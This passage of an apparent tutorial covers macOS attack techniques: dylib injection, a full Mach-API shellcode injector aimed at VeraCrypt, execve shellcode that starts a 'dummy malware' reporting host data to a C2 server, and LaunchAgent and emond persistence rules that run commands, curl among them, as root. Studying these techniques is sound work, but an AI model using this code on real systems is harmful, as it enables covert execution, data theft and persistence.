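    demo_env = {"DYLD_INSERT_LIBRARIES": "inject.dylib:/tmp/other.dylib"}
    for position, path in enumerate(parse_insert_libraries(demo_env)):
        print(position, path)
```

An empty or missing variable simply yields an empty list, which is
the normal state for almost every process on a healthy system.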

In simple terms, it will load any dylibs you specify in this variable
before the program loads, essentially injecting a dylib into the
application. For example:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Runs automatically when the dylib is loaded, before main()
__attribute__((constructor))
void foo(void) {
  printf("Dynamic library injected! \n");
  system("/bin/bash -c 'echo Library injected!'");
}

As you can see, we have a function foo() that prints a message to let
us know that we successfully injected the library, plus a system()
call that spawns a shell to echo basically the same thing. The
__attribute__((constructor)) attribute marks the function to run
before the main function of the application into which we injected
the dylib. Piece of cake, right? But how do we identify binaries
vulnerable to environment variable injection? More on that later;
first, let's just try it on one of our previous programs. Compile the
code as a dynamic library and run it.

~ > gcc -dynamiclib inject.c -o inject.dylib

~ > DYLD_INSERT_LIBRARIES=inject.dylib ./foo
Dynamic library injected!
Library injected!

Et voilà. dyld loads every dylib listed in the variable before the
program itself, which effectively injects our code into the
application. This could potentially lead to privilege escalation,
right? Not so fast: Apple platform binaries are protected, and as of
macOS 10.14, third-party developers can opt in to a hardened runtime
for their application, which can prevent the injection of dylibs
using this technique.

So, basically, we can still perform injection in two cases: when the
application does not use the Hardened Runtime and therefore honors
the environment variable, or when the binary uses the Hardened
Runtime but the developer shipped it with the appropriate
entitlements. The relevant entitlements are:

  * The com.apple.security.cs.disable-library-validation entitlement
    lets the process load any dylib without checking who signed the
    binary and the library. This permission usually exists in
    programs that allow community-written plugins.
  * The com.apple.security.cs.allow-dyld-environment-variables
    entitlement loosens the hardened runtime restrictions and allows
    the use of DYLD_INSERT_LIBRARIES to inject a library.
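
The decision described above can be summarized in a few lines of
Python. This is a simplified model and not how dyld is implemented:
it assumes we already know whether the binary is hardened and which
entitlements it carries (for instance from codesign output), it
assumes the dylib is not signed by the same team as the host, and it
ignores other restrictions such as SIP-protected platform binaries.
The function name is hypothetical.

```python
ALLOW_DYLD_ENV = "com.apple.security.cs.allow-dyld-environment-variables"
DISABLE_LIB_VALIDATION = "com.apple.security.cs.disable-library-validation"


def insert_libraries_honoured(hardened, entitlements):
    """Simplified model: would a foreign dylib listed in
    DYLD_INSERT_LIBRARIES be loaded by this binary?"""
    if not hardened:
        # No Hardened Runtime: the environment variable is honoured.
        return True
    # Hardened: the variable must be allowed AND library validation
    # must be disabled for a dylib signed by someone else to load.
    return bool(entitlements.get(ALLOW_DYLD_ENV)) and bool(
        entitlements.get(DISABLE_LIB_VALIDATION)
    )


if __name__ == "__main__":
    print(insert_libraries_honoured(False, {}))
    print(insert_libraries_honoured(True, {}))
    print(insert_libraries_honoured(
        True, {ALLOW_DYLD_ENV: True, DISABLE_LIB_VALIDATION: True}))
```

The same check is useful when auditing your own applications: a
hardened binary that ships both entitlements deserves a second look.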

Now for a possible target application. Trying this against
Safari.app, for example, won't work, because it is hardened and lacks
the matching entitlement:

[IMG3]

But the absence of an entitlement doesn't necessarily imply that the
application is not hardened, as there are other Hardened Runtime
features that may not be reflected in the entitlements. To expedite
the process, I found that VeraCrypt is not using the Hardened
Runtime, so I'm going to use it as the example for the rest of the
article. Sorry :) Now, let's attempt to inject into it, but first...

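#include <stdio.h>
#include <syslog.h>

// dyld passes argc/argv to initializers, so argv[0] is the host program
__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
{
    printf("Foo!\n");
    syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
}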

So, we simply print 'foo' and log a message using the syslog()
function, which logs an error message indicating successful injection
of a dynamic library (dylib) along with the name of the program.
Let's try it. If we see the following output, it seems that we've
successfully loaded the library:

[IMG4]

If we attempt to use DYLD_INSERT_LIBRARIES in another binary that is
hardened and lacks the matching entitlement, we won't be able to load
the library, and consequently, we won't see the desired output.

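DYLD_INSERT_LIBRARIES only takes effect when a process is launched.
To get code into a task that is already running, you create a thread
in it with the Mach APIs. However, some internal components of macOS
expect threads to be created using the BSD APIs and have all Mach
thread structures and pthread structures set up properly. This can
present challenges, especially with changes introduced in macOS
10.14.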

To address this issue, I came across a piece of code called inject.c.
Additionally, I highly recommend reading the "Mac Hacker's Handbook"
as it provides invaluable insights and includes great examples of
interprocess code injection.

From my understanding, the transition from Mach thread APIs to
pthread APIs in macOS, particularly concerning the initialization of
thread structures, presents challenges. However, the discovery of the
_pthread_create_from_mach_thread function provides a viable
alternative for initializing pthread structures from bare Mach
threads. This ensures compatibility and proper functioning of
threaded applications across different macOS versions.

For those interested, I've included examples demonstrating how to
inject code to call dlopen and load a dylib into a remote Mach task:
Gist 1 & Gist 2

Alright, let's discuss the second technique: process injection, which
is the ability for one process to execute code in a different
process. It's similar to methods used on Windows, where it is often
utilized to evade detection by antivirus software, for example,
through a technique known as DLL hijacking. This allows malicious
code to masquerade as part of a different executable. In macOS, this
technique can have significantly more impact due to the differences
in permissions between applications.

In the classic Unix security model, each process runs as a specific
user. Each file has an owner, group, and flags that determine which
users are allowed to read, write, or execute that file. Two processes
running as the same user have the same permissions; it is assumed
there is no security boundary between them. Users are considered
security boundaries; processes are not. If two processes are running
as the same user, then one process could attach to the other as a
debugger, allowing it to read or write the memory and registers of
that other process. The root user is an exception, as it has access
to all files and processes. Thus, root can always access all data on
the computer, whether on disk or in RAM.

This was essentially the security model of macOS as well, until the
introduction of... yep, SIP (System Integrity Protection) in OS X
10.11.
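
The classic model described above can be sketched in Python as a
small read-permission check. This is an illustration of the
owner/group/other logic only, not the kernel's implementation; the
function name and the sample UIDs and GIDs are made up, and ACLs,
sandboxing and SIP are deliberately left out.

```python
import stat


def may_read(uid, gids, owner_uid, owner_gid, mode):
    """Classic Unix read check: root, then owner, then group, then other."""
    if uid == 0:
        return True  # root is the exception and can read everything
    if uid == owner_uid:
        return bool(mode & stat.S_IRUSR)
    if owner_gid in gids:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)


if __name__ == "__main__":
    # A file owned by uid 501, group 20, with mode rw-------
    print(may_read(501, {20}, 501, 20, 0o600))  # owner
    print(may_read(502, {20}, 501, 20, 0o600))  # same group, other user
    print(may_read(0, set(), 501, 20, 0o600))   # root
```

Note that nothing in this check distinguishes two processes of the
same user, which is exactly why users, not processes, were the
security boundary.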

OS X Shellcode Injection

Alright, so we're going to write a simple shellcode injection program
where the malware's host process injects shellcode into the memory of
a remote process. But before we proceed, let's write a simple
shellcode for testing purposes.

Writing 64-bit assembly on macOS differs somewhat from doing so for
ELF targets. Here, you need to understand the macOS executable file
format, known as Mach-O. For simplicity, we'll stick with the x86_64
architecture, and later use a linker to produce a Mach-O executable.

A simple "Hello World" program starts by declaring two sections:
.data and .text. The .data section is used for storing initialized
data, while the .text section contains executable code. Then we
define the _main function as the entry point of the program, which
immediately jumps to a reference point in the code that we'll call
trick. At trick, a call instruction invokes the continue subroutine;
because call pushes the address of whatever follows it (here, the
string 'Hello World!') onto the stack, continue can simply pop that
address into rsi. The first syscall writes the string to standard
output, and the second syscall at the end exits our program.

section .data
section .text

global _main
        _main:

start:
        jmp trick

continue:
        pop rsi            ; Pop string address into rsi
        mov rax, 0x2000004 ; System call write = 4
        mov rdi, 1         ; Write to standard out = 1
        mov rdx, 14        ; The size to write
        syscall            ; Invoke the kernel
        mov rax, 0x2000001 ; System call number for exit = 1
        mov rdi, 0         ; Exit success = 0
        syscall            ; Invoke the kernel

trick:
        call continue
        db "Hello World!", 0x0d, 0x0a ; 14 bytes, matching rdx
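
A quick note on the odd-looking syscall numbers such as 0x2000004: on
x86_64 macOS the value in rax carries a syscall class in its upper
bits, and class 2 selects the BSD (Unix) syscalls. The small Python
sketch below only reproduces that arithmetic; the constant names
mirror the ones used in the XNU headers, while the helper name is
made up.

```python
SYSCALL_CLASS_SHIFT = 24  # the class lives above the low 24 bits
SYSCALL_CLASS_UNIX = 2    # BSD syscalls such as write, exit, execve


def bsd_syscall(number):
    """Combine the Unix class with a BSD syscall number."""
    return (SYSCALL_CLASS_UNIX << SYSCALL_CLASS_SHIFT) | number


if __name__ == "__main__":
    print(hex(bsd_syscall(4)))   # write  -> 0x2000004
    print(hex(bsd_syscall(1)))   # exit   -> 0x2000001
    print(hex(bsd_syscall(59)))  # execve -> 0x200003b
```

Setting bit 25 of a register that already holds the bare syscall
number gives the same result, since 2 << 24 is the same as 1 << 25.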

Alright, it's time to compile. I typically use NASM for assembling my
code. Remember what I mentioned about using the linker to create
Mach-O executables? Well, after assembling the code with NASM, we'll
need to link it using ld. This linker not only brings together the
assembled code but also incorporates necessary system libraries.

~ > ./nasm -f macho64 Hello.asm -o Hello.o && ld ./Hello.o -o Hello -lSystem -syslibroot `xcrun -sdk macosx --show-sdk-path`

~ > ./Hello
Hello World!

Pretty sophisticated, right? Now, to actually turn it into machine
code that we can use for injection, it needs to be converted into a
hexadecimal representation. This representation consists of a small
series of bytes that represent executable machine-language code. It
essentially represents the exact sequence of instructions that the
processor will execute. For this, we can utilize objdump.

~ > objdump -d ./Hello | grep '[0-9a-f]:'| grep -v 'file'| cut -f2 -d:| cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '| sed 's/ $//g'| sed 's/ /\\x/g'| paste -d '' -s | sed 's/^/"/'| sed 's/$/"/g'

`\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a`
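
Before trusting a string like this, it's worth a sanity check. The
Python sketch below decodes the escaped text back into raw bytes and
confirms its length and the embedded string. The helper name
decode_escaped is made up; the byte string is copied from the output
above.

```python
import re

ESCAPED = (
    r"\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01"
    r"\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05"
    r"\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00"
    r"\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c"
    r"\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a"
)


def decode_escaped(text):
    """Turn a '\\xNN\\xNN...' string into the bytes it represents."""
    pairs = re.findall(r"\\x([0-9a-fA-F]{2})", text)
    return bytes(int(pair, 16) for pair in pairs)


payload = decode_escaped(ESCAPED)

if __name__ == "__main__":
    print(len(payload))   # 51
    print(payload[-14:])  # b'Hello World!\r\n'
```

The last 14 bytes are the string itself, which matches the length
passed to the write syscall in rdx.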

If, for some reason, you can't extract the shellcode relying solely
on objdump, you can always throw together a simple Python script to
parse the disassembly (pipe the output of objdump -d into it):

import re
import sys

def extract_shellcode(objdump_output):
    shellcode = ""
    length = 0
    lines = objdump_output.split('\n')

    for line in lines:
        if re.match("^[ ]*[0-9a-f]*:.*$", line):
            line = line.split(":")[1].lstrip()
            x = line.split("\t")
            opcode = re.findall("[0-9a-f][0-9a-f]", x[0])
            for i in opcode:
                shellcode += "\\x" + i
                length += 1

    return shellcode, length

def main():
    objdump_output = sys.stdin.read()
    shellcode, length = extract_shellcode(objdump_output)

    if shellcode == "":
        print("Bad")
    else:
        print("\n" + shellcode)

if __name__ == "__main__":
    main()

But does the shellcode work? To ensure its functionality, we should
test whether we can perform a simple injection. One way to do this is
by compiling the shellcode and storing it as a global variable within
the executable's __TEXT,__text section. We can achieve this by
declaring the shellcode as a variable within the code itself. Here's
a simple example:

const char output[] __attribute__((section("__TEXT,__text"))) =
    "\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01"
    "\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05"
    "\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00"
    "\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c"
    "\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a";

typedef int (*funcPtr)();

int main(int argc, char **argv)
{
    funcPtr ret = (funcPtr) output;
    (*ret)();

    return 0;
}

Alright, now that we have the shellcode, let's start writing the
actual injector. The main function seems like the natural starting
point. The logic is simple: we take a single command-line argument,
which should be the process ID (PID) of the target process to inject
the shellcode into. Then, we obtain a handle to the target's task
using task_for_pid(). Next, we'll allocate a memory buffer in the
remote task with mach_vm_allocate(). After that, we'll write our
shellcode to the remote buffer with mach_vm_write(). We'll modify the
memory permissions of the remote buffer with vm_protect(). Then,
we'll create a remote thread with thread_create() and use
thread_set_state() to point its context at the start of the
shellcode. Finally, we'll resume the thread with thread_resume() to
run our shellcode, which will print "Hello World".

Remember our earlier discussion about the differences between a Mach
task thread and a BSD pthread, and about the task_for_pid() API call?
In order to develop a utility that utilizes task_for_pid(), you'll
need to create an Info.plist file. This file will be embedded into
your executable and used during code signing, with the key shown
below set to true. Below is an example of the Info.plist:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.apple.security.get-task-allow</key>
<true/>
</dict>
</plist>

Note: not all sections of a program's virtual memory permit their
contents to be interpreted as code by the CPU (i.e., "marked
executable"). Memory can be marked as readable (R), writable (W),
executable (E), or some combination of the three. For instance, a
page marked RW means one can read/write to these addresses in memory,
but their contents may not be treated as executable by the CPU. This
is a crucial aspect of memory protection and security in modern
operating systems.

Executable memory regions are typically marked with the execute (E)
permission, allowing the CPU to interpret the contents of these
regions as machine instructions and execute them. This is essential
for running programs, as the CPU needs to fetch instructions from
memory and execute them.

However, allowing arbitrary memory regions to be executable can pose
significant security risks, such as buffer overflow attacks or
injection of malicious code. Therefore, modern operating systems
employ memory protection mechanisms to restrict the execution of code
to specific, authorized regions of memory.

By controlling the permissions of memory pages, operating systems can
enforce security policies and prevent unauthorized execution of code.
For example, writable memory regions that contain data should not be
executable to prevent the execution of injected malicious code.
Conversely, executable code should not be writable to prevent
tampering with the program's instructions.
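
The "writable or executable, but not both" rule from the paragraphs
above is easy to express in code. Here is a minimal Python sketch
that models page permissions as flags and reports combinations that
break the rule. The numeric values match the Mach VM_PROT_READ,
VM_PROT_WRITE and VM_PROT_EXECUTE constants; the class and function
names are made up for illustration.

```python
from enum import IntFlag


class Prot(IntFlag):
    READ = 1     # same value as VM_PROT_READ
    WRITE = 2    # same value as VM_PROT_WRITE
    EXECUTE = 4  # same value as VM_PROT_EXECUTE


def violates_wx(prot):
    """True when a region is both writable and executable."""
    return bool(prot & Prot.WRITE) and bool(prot & Prot.EXECUTE)


def describe(prot):
    """Render permissions in the R/W/E notation used in this article."""
    letters = ((Prot.READ, "R"), (Prot.WRITE, "W"), (Prot.EXECUTE, "E"))
    return "".join(letter if prot & flag else "-" for flag, letter in letters)


if __name__ == "__main__":
    for prot in (Prot.READ | Prot.WRITE,
                 Prot.READ | Prot.EXECUTE,
                 Prot.READ | Prot.WRITE | Prot.EXECUTE):
        print(describe(prot), "violates W^X:", violates_wx(prot))
```

A memory scanner built on this idea would flag any RWE region in a
process as worth investigating.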

Alright, at the entry point we convert the PID provided as a string
to an integer and call the inject_shellcode function to inject the
shellcode into the target process identified by that PID.

We need to interact with the target process, so we declare a few
variables to hold essential information. These include remote_task to
represent the task port of the target process, remote_stack to store
the address of the allocated memory for the remote stack within the
target process, and shellcode_region to keep track of the memory
region allocated for the shellcode.

Now, the process begins. We need to get permission to access the
target process, so we use the task_for_pid function to obtain the
task port. This allows us to manipulate the memory and threads of the
target process.

With access granted, we proceed to allocate memory within the target
process. We reserve space for both the remote stack and the shellcode
using mach_vm_allocate. This ensures that we have a place to execute
our code. Once memory is allocated, we write our shellcode into the
allocated memory space of the target process using mach_vm_write.
This effectively places our code where it needs to be executed.

int inject_shellcode(pid_t pid, unsigned char *shellcode, size_t shellcode_size) {
    task_t remote_task;
    mach_vm_address_t remote_stack = 0;
    vm_region_t shellcode_region;
    mach_error_t kr;

    // Get the task port for the target process
    kr = task_for_pid(mach_task_self(), pid, &remote_task);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to get the task port for the target process: %s\n", mach_error_string(kr));
        return -1;
    }

    // Allocate memory for the stack in the target process
    kr = mach_vm_allocate(remote_task, &remote_stack, STACK_SIZE, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to allocate memory for remote stack: %s\n", mach_error_string(kr));
        return -1;
    }

    // Allocate memory for the shellcode in the target process
    kr = mach_vm_allocate(remote_task, &shellcode_region.addr, shellcode_size, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to allocate memory for remote code: %s\n", mach_error_string(kr));
        return -1;
    }
    shellcode_region.size = shellcode_size;
    shellcode_region.prot = VM_PROT_READ | VM_PROT_EXECUTE;

    // Write the shellcode to the allocated memory in the target process
    kr = mach_vm_write(remote_task, shellcode_region.addr, (vm_offset_t)shellcode, shellcode_size);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to write shellcode to remote process: %s\n", mach_error_string(kr));
        return -1;
    }

    // Adjust memory permissions for the shellcode
    kr = vm_protect(remote_task, shellcode_region.addr, shellcode_region.size, FALSE, shellcode_region.prot);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to set memory permissions for remote code: %s\n", mach_error_string(kr));
        return -1;
    }

    // Create a remote thread to execute the shellcode
    x86_thread_state64_t thread_state;
    memset(&thread_state, 0, sizeof(thread_state));
    thread_state.__rip = (uint64_t)shellcode_region.addr;
    thread_state.__rsp = (uint64_t)(remote_stack + STACK_SIZE);

    thread_act_t remote_thread;
    kr = thread_create(remote_task, &remote_thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to create remote thread: %s\n", mach_error_string(kr));
        return -1;
    }

    // Set the thread state
    kr = thread_set_state(remote_thread, x86_THREAD_STATE64, (thread_state_t)&thread_state, x86_THREAD_STATE64_COUNT);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to set thread state: %s\n", mach_error_string(kr));
        return -1;
    }

    // Resume the remote thread
    kr = thread_resume(remote_thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to resume remote thread: %s\n", mach_error_string(kr));
        return -1;
    }

    printf("Shellcode injected successfully!\n");

    mach_port_deallocate(mach_task_self(), remote_thread);

    return 0;
}

To ensure that our shellcode can run, we modify the memory
permissions of the allocated memory region containing the shellcode.
We use vm_protect to set the appropriate permissions, allowing for
execution. Now, it's time to execute our shellcode. We create a
remote thread within the target process using thread_create. This
thread will be responsible for running our injected code.

Before we start the thread, we need to set its state. We prepare the
thread to execute our shellcode by setting the instruction pointer
(rip) to the starting address of the shellcode and the stack pointer
(rsp) to the allocated remote stack. Finally, we're ready to execute
our shellcode. We resume the remote thread using thread_resume,
allowing it to begin executing the injected code.

If everything goes smoothly, we print a success message indicating
that the shellcode was injected successfully. We also clean up any
resources used during the injection process by deallocating Mach
ports. And that's it: the entire process of injecting shellcode into
a target process on macOS using Mach APIs.

In our injector, we're injecting shellcode into a target process
using Mach APIs in macOS. Now, one significant difference between
POSIX threads and Mach threads comes into play here. POSIX threads
utilize the thread local storage (TLS) data structure, which is
crucial for managing thread-specific data. However, Mach threads
don't have this concept of TLS.

Now, when we inject our shellcode into the target process and create
a remote thread to execute it, we can't simply point the instruction
pointer in the thread context struct and expect everything to work
smoothly. Why? Because our shellcode, which is essentially unmanaged
code, needs to run in a controlled environment, and transitioning
from a Mach thread directly to executing our shellcode might cause
issues.

So, to prevent potential crashes or errors, we need to ensure that
our shellcode is executed within the context of a fully-fledged POSIX
thread. This means that as part of our injection process, we have to
somehow promote our shellcode from being executed within the context
of a base Mach thread to being executed within the context of a POSIX
thread. By doing this, we create a more stable environment for our
shellcode to execute, ensuring that when the target process resumes
its execution at the start of our shellcode, it does so without any
issues. This promotion process is essential for the successful
execution of our injected shellcode in user mode without causing
crashes or unexpected behavior.

As you can see, we injected our shellcode into the VeraCrypt process
successfully. The message "Hello World!" was printed, confirming that
the shellcode executed as expected and produced the desired output.

[IMG5]

However, let's shift our focus now. Remember the code we previously
developed to transmit system data to the C2 server? What if we inject
shellcode into the Veracrypt process to execute our dummy malware,
enabling it to establish communication with the C2 server and
transmit host data?

To execute a shell command, considering I'm running zsh, we need to
trigger a syscall to run /bin/zsh -c. For this, we need to utilize
execve. What does this do? Simply put, it executes the program
referenced by pathname, which in our case will be the path to our
dummy malware executable.

Alright, let's proceed by writing a simple assembly code to execute
/bin/zsh -c '/Users/foo/dummy'. First, we'll set up a register (rbx)
and load the string '/bin/zsh' into it. Once this string is pushed
onto the stack, we'll proceed to load the ASCII values for -c into
the lower 16 bits of the rax register. After pushing this -c flag
onto the stack, we'll set the rbx register to point to the -c flag on
the stack, as it will be necessary later during the syscall
preparation.

Any additional details are described in comments within the code. At
the end of the first block, there's a short jump to the dummy label.
The call instruction there pushes the address of the command string
onto the stack and transfers control to the exec subroutine, which
builds the argument array and invokes the syscall.

global _main

_main:
    xor rdx, rdx        ; Clear rdx register
    push rdx            ; Push NULL onto stack (String terminator)
    mov rbx, '/bin/zsh' ; Load '/bin/zsh' into rbx
    push rbx            ; Push '/bin/zsh' onto stack
    mov rdi, rsp        ; Set rdi to point to '/bin/zsh\0'
    xor rax, rax        ; Clear rax register
    mov ax, 0x632D      ; Load "-c" into lower 16 bits of rax
    push rax            ; Push "-c" onto stack
    mov rbx, rsp        ; Set rbx to point to "-c"
    push rdx            ; Push NULL onto stack
    jmp short dummy     ; Jump to label dummy

exec:
    push rbx            ; Push "-c" onto stack
    push rdi            ; Push '/bin/zsh' onto stack
    mov rsi, rsp        ; Set RSI to point to stack
    push 59             ; Push syscall number
    pop rax             ; Pop syscall number into rax
    bts rax, 25         ; Set bit 25: 0x2000000, the BSD syscall class
    syscall             ; Invoke syscall

dummy:
    call exec                   ; Call subroutine exec
    db '/Users/foo/dummy_m', 0  ; Define string
    push rdx                    ; Push NULL onto stack

Alright, it's time to try this beauty. As usual, we'll need to
extract the shellcode and test it before using it. And just like
that, bingo! We've successfully injected our shellcode, triggering
our dummy malware. We're now receiving host information in the C2
server. We can push this further by exploring additional capabilities
and attack vectors, even achieve persistence, but I think that's
enough for now.

[IMG6]

Executing and sending host information essentially does nothing
harmful to your computer. "Dummy" is more about demonstrating how
malware can be triggered and how it uses injection techniques to
spread. It's also interesting for defensive evasion or adding
backdoor capabilities. This was just a quick look at the Mach API,
covering system calls and code injection techniques, and how an
attacker can utilize something like process injection to achieve
malicious behavior. In this example, we've used a legitimate process
to inject and execute "malicious code," potentially exposing host
data to an attacker. This can be pushed further, but we're here just
to learn, and I encourage you to experiment with caution. Code
injection must be used with care.

I hope you've learned something from this simple introduction, and
there's a lot more to explore beyond what we've touched on here. All
the code used here can be found on GitHub.

Persistence

Alright, let's discuss persistence. It's a crucial step once we've
gained initial access and understood the situation. Typically, we aim
to establish some form of persistence. We don't want to rely solely
on that initial access point because it could be terminated for
various reasons. There might be issues with the user's computer, or
the target could decide to shut everything down. So, it's important
to have a method in place to maintain access to the target.

While there are several persistence techniques for macOS systems,
many of them require root privileges to perform, or exploit some sort
of low-level vulnerability to escalate. To keep things simple, let's
focus on Userland Persistence. First, I'll describe some well-known
persistence techniques and some lesser-known ones, so you can
understand how these techniques work and how malware can use them.
Alright, let's go:

Before I began writing this article, I analyzed some samples
targeting macOS and read some threat reports. One commonality among
them is that launch agents and launch daemons are by far the most
prevalent methods of persistence. Why, you might ask? Well, it's
because of their simplicity and flexibility. You could liken them to
the startup folder persistence equivalent on Windows. However,
detecting such techniques is relatively easy. Remember when we
mentioned LOLBins? Well, think of it as a similarly straightforward
and common method, and the detection methods are also well-known.

LaunchAgent & LaunchDaemon

LaunchAgents and LaunchDaemons are key components of macOS,
responsible for managing processes automatically. LaunchAgents are
typically located in the ~/Library/LaunchAgents directory for
user-specific tasks, triggering actions when a user logs in. On the
flip side, LaunchDaemons are situated in /Library/LaunchDaemons,
initiating tasks upon system startup.

Although LaunchAgents primarily operate within user sessions, they
can also be found in system directories like
/System/Library/LaunchAgents. However, modifying these files would
require disabling System Integrity Protection (SIP), which is not
recommended due to potential security risks. In contrast,
LaunchDaemons, operating at a system level, require administrator
privileges for installation and typically reside in
/Library/LaunchDaemons.

Both LaunchAgents and LaunchDaemons are configured using .plist
files, specifying commands or referencing executable files for
execution.

LaunchAgents are suitable for tasks requiring user interaction, while
LaunchDaemons are better suited for background processes. Let's look
at a LaunchAgent example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.pre.foo.plist</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/foo/dummy</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
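
Because these definitions are plain property lists, they are just as
easy to audit as they are to write. As a hedged sketch, the Python
below uses the standard plistlib module to pull out the fields that
matter when reviewing a LaunchAgent. The function name
summarize_launch_item is made up, and the sample is a trimmed copy of
the plist above.

```python
import plistlib

SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.pre.foo.plist</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/foo/dummy</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>"""


def summarize_launch_item(plist_bytes):
    """Extract the label, the executable and the RunAtLoad flag."""
    data = plistlib.loads(plist_bytes)
    arguments = data.get("ProgramArguments") or [None]
    return {
        "label": data.get("Label"),
        "program": data.get("Program") or arguments[0],
        "run_at_load": bool(data.get("RunAtLoad", False)),
    }


if __name__ == "__main__":
    print(summarize_launch_item(SAMPLE))
```

Running something like this over every file in the LaunchAgents and
LaunchDaemons directories gives a quick inventory of what starts
automatically, and an executable living in a user's home directory
stands out immediately.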

So, what does this all mean? Basically, when we want our binary to
run every time a user logs onto the system, we just tell launchd to
handle it. It's pretty straightforward, right? But here's where it
gets interesting: there's something called emond, a command native to
macOS located at /sbin/emond. This little tool is quite handy; it
accepts events from various services, processes them through a simple
rules engine, and takes action accordingly. These actions can involve
running commands or performing other tasks.

Now, emond isn't just any ordinary command. It functions as a regular
daemon and is kicked off by launchd every time the operating system
starts up. Its configuration file, where we set when and how emond
runs, hangs out with the other system daemons at
/System/Library/LaunchDaemons/com.apple.emond.plist.

But how can we use this event monitoring daemon to establish
persistence? Well, the mechanics of emond are pretty much like any
other LaunchDaemon. It's launchd's job to fire up all the
LaunchDaemons and LaunchAgents during the boot process. Since emond
starts up during boot, if you're using the run command action, you
need to be mindful of what command you're executing and when during
the boot process it'll happen.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
    <dict>
        <key>name</key>
        <string>foo</string>
        <key>enabled</key>
        <true/>
        <key>eventTypes</key>
        <array>
            <string>startup</string>
        </array>
        <key>actions</key>
        <array>
            <dict>
                <key>command</key>
                <string>sleep</string>
                <key>user</key>
                <string>root</string>
                <key>arguments</key>
                <array>
                    <string>10</string>
                </array>
                <key>type</key>
                <string>RunCommand</string>
            </dict>
            <dict>
                <key>command</key>
                <string>curl</string>
                <key>user</key>
                <string>root</string>
                <key>arguments</key>
                <array>
                    <string>dns.log</string>
                </array>
                <key>type</key>
                <string>RunCommand</string>
            </dict>
        </array>
    </dict>
</array>
</plist>

So, in our SampleRules.plist file, we have a rule called 'foo' that
is bound to the startup event. First, it waits 10 seconds after
startup, using the sleep command. Next, curl makes a request whose
only purpose is to generate a DNS query we can observe, which
verifies that the rule is actually working. Once the emond service
has started, the event fires immediately and triggers the actions.
emond isn't a new way to monitor events on macOS, but it's considered
innovative when used for offensive purposes.
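
To make the layout of that rule concrete, here is a small sketch that
parses it with Python's plistlib and lists each RunCommand action as
the argv it describes. The rule text is the 'foo' rule from above,
only compacted; summarize_rules is a hypothetical helper, and walking
the actions in file order is my reading of the rule, not documented
emond behaviour.

```python
import plistlib

# The 'foo' rule from above, compacted onto fewer lines.
RULES_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
    <dict>
        <key>name</key><string>foo</string>
        <key>enabled</key><true/>
        <key>eventTypes</key>
        <array><string>startup</string></array>
        <key>actions</key>
        <array>
            <dict>
                <key>command</key><string>sleep</string>
                <key>user</key><string>root</string>
                <key>arguments</key><array><string>10</string></array>
                <key>type</key><string>RunCommand</string>
            </dict>
            <dict>
                <key>command</key><string>curl</string>
                <key>user</key><string>root</string>
                <key>arguments</key><array><string>dns.log</string></array>
                <key>type</key><string>RunCommand</string>
            </dict>
        </array>
    </dict>
</array>
</plist>
"""


def summarize_rules(data):
    """Return (rule name, event types, user, argv) for each enabled RunCommand."""
    summary = []
    for rule in plistlib.loads(data):
        if not rule.get("enabled", False):
            continue  # disabled rules are skipped
        events = tuple(rule.get("eventTypes", []))
        for action in rule.get("actions", []):
            if action.get("type") != "RunCommand":
                continue
            argv = [action["command"], *action.get("arguments", [])]
            summary.append((rule["name"], events, action.get("user"), argv))
    return summary


if __name__ == "__main__":
    for name, events, user, argv in summarize_rules(RULES_XML):
        print(name, events, user, argv)
```

Reading a rule this way is also a quick check on any rules file you
come across: each row tells you which user would run which command,
and on which event.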

Bash Profiles & Zsh Startup

